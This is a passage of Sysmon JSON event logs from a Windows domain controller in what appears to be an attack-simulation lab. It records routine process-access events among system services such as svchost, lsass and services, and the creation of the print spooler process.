{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1160,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1161,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:22.580\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\wer.dll+6dc28|C:\\Windows\\System32\\wer.dll+370d0|C:\\Windows\\System32\\wer.dll+383dc|C:\\Windows\\System32\\wer.dll+13954|C:\\Windows\\System32\\wer.dll+51b6|c:\\windows\\system32\\wuaueng.dll+d4ca8|c:\\windows\\system32\\wuaueng.dll+554a8|c:\\windows\\system32\\wuaueng.dll+4e24b|c:\\windows\\system32\\wuaueng.dll+4e49b|c:\\windows\\system32\\wuaueng.dll+4e5fe|c:\\windows\\system32\\wuaueng.dll+4fb28|c:\\windows\\system32\\wuaueng.dll+5c36f|c:\\windows\\system32\\wuaueng.dll+4d1d5|c:\\windows\\system32\\wuaueng.dll+4c805|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:22.580","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"2928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\wer.dll+6dc28|C:\\Windows\\System32\\wer.dll+370d0|C:\\Windows\\System32\\wer.dll+383dc|C:\\Windows\\System32\\wer.dll+13954|C:\\Windows\\System32\\wer.dll+51b6|c:\\windows\\system32\\wuaueng.dll+d4ca8|c:\\windows\\system32\\wuaueng.dll+554a8|c:\\windows\\system32\\wuaueng.dll+4e24b|c:\\windows\\system32\\wuaueng.dll+4e49b|c:\\windows\\system32\\wuaueng.dll+4e5fe|c:\\windows\\system32\\wuaueng.dll+4fb28|c:\\windows\\system32\\wuaueng.dll+5c36f|c:\\windows\\system32\\wuaueng.dll+4d1d5|c:\\windows\\system32\\wuaueng.dll+4c805|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1162,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:22.580\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:22.580","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1163,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.834\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.834","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1164,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1165,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1166,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.834\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.834","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1167,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.839\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001073B90200}\r\nProcessId: 2900\r\nImage: C:\\Windows\\System32\\spoolsv.exe\r\nFileVersion: 10.0.14393.3808 (rs1_release.200707-2105)\r\nDescription: Spooler SubSystem App\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: spoolsv.exe\r\nCommandLine: C:\\Windows\\System32\\spoolsv.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.839","ProcessGuid":"{41C8662E-1F73-5F25-0000-001073B90200}","Image":"C:\\Windows\\System32\\spoolsv.exe","FileVersion":"10.0.14393.3808 (rs1_release.200707-2105)","Description":"Spooler SubSystem App","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"spoolsv.exe","CommandLine":"C:\\Windows\\System32\\spoolsv.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1168,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.852\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 